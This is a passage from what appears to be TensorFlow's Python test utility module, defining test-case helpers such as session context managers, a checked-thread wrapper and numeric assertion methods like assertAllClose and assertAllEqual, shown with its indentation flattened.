tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, (str, bytes)):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s." %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, indexed_slices.IndexedSlices):
return indexed_slices.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
# Convert tensors and composite tensors to numpy arrays.
return nest.map_structure(lambda t: t.numpy(), tensor,
expand_composites=True)
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=True, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session():
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=True,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session() as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=True,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tf_type(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def evaluate_if_both_tensors(self, a, b):
if (tensor_util.is_tf_type(a) and tensor_util.is_tf_type(b) and
not isinstance(a, ops._EagerTensorBase) and
not isinstance(b, ops._EagerTensorBase)):
return self.evaluate((a, b))
else:
return (a, b)
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
(a, b) = self.evaluate_if_both_tensors(a, b)
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
# np.allclose does not always work for our custom bfloat16 extension type
# when type promotions are involved, so we first cast any bfloat16 arrays
# to float32.
a_dtype = a.dtype
a = a.astype(np.float32) if a.dtype == dtypes.bfloat16.as_numpy_dtype else a
b = b.astype(np.float32) if b.dtype == dtypes.bfloat16.as_numpy_dtype else b
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a_dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
(a, b) = self.evaluate_if_both_tensors(a, b)
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError, NotImplementedError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
(a, b) = self.evaluate_if_both_tensors(a, b)
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
except AssertionError:
return
msg = msg or ""
raise AssertionError("The two values are close at all elements. %s" % msg)
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
(a, b) = self.evaluate_if_both_tensors(a, b)
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = %r" % x)
msgs.append("not equal rhs = %r" % y)
# Handle mixed string types as a result of PY2to3 migration. That is, the
# mixing between bytes (b-prefix strings, PY2 default) and unicodes
# (u-prefix strings, PY3 default).
if six.PY3:
if (a.dtype.kind != b.dtype.kind and
{a.dtype.kind, b.dtype.kind}.issubset({"U", "S", "O"})):
a_list = []
b_list = []
# OK to flatten `a` and `b` because they are guaranteed to have the
# same shape.
for out_list, flat_arr in [(a_list, a.flat), (b_list, b.flat)]:
for item in flat_arr:
if isinstance(item, str):
out_list.append(item.encode("utf-8"))
else:
out_list.append(item)
a = np.array(a_list)
b = np.array(b_list)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
(a, comparison_target) = self.evaluate_if_both_tensors(a, comparison_target)
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
(a, comparison_target) = self.evaluate_if_both_tensors(a, comparison_target)
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
(a, comparison_target) = self.evaluate_if_both_tensors(a, comparison_target)
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
(a, comparison_target) = self.evaluate_if_both_tensors(a, comparison_target)
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
if np.ndim(value) == 0:
return [prefix + "[0] : " + str(value)]
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertRaisesIncompatibleShapesError(
self, exception_type=errors.InvalidArgumentError):
return self.assertRaisesWithPredicateMatch(
exception_type, r"Incompatible shapes|Dimensions must be equal|"
r"required broadcastable shapes")
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
@py_func_if_in_function
def assertDictEqual(self, a, b, msg=None):
"""Assert that two given dictionary of tensors are the same.
Args:
a: Expected dictionary with numpy ndarray or anything else that can be
converted to one as values.
b: Actual dictionary with numpy ndarray or anything else that can be
converted to one as values.
msg: Optional message to report on failure.
"""
# To keep backwards compatibility, we first try the base class
# assertDictEqual. If that fails we try the tensorflow one.
try:
super().assertDictEqual(a, b, msg)
except Exception: # pylint: disable=broad-except
self.assertSameElements(a.keys(), b.keys()) # pylint: disable=g-assert-in-except
for k, v in a.items():
(a_k, b_k) = self.evaluate_if_both_tensors(v, b[k])
a_k = self._GetNdArray(a_k)
b_k = self._GetNdArray(b_k)
if np.issubdtype(a_k.dtype, np.floating):
self.assertAllClose(v, b[k], msg=k)
else:
self.assertAllEqual(v, b[k], msg=k)
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
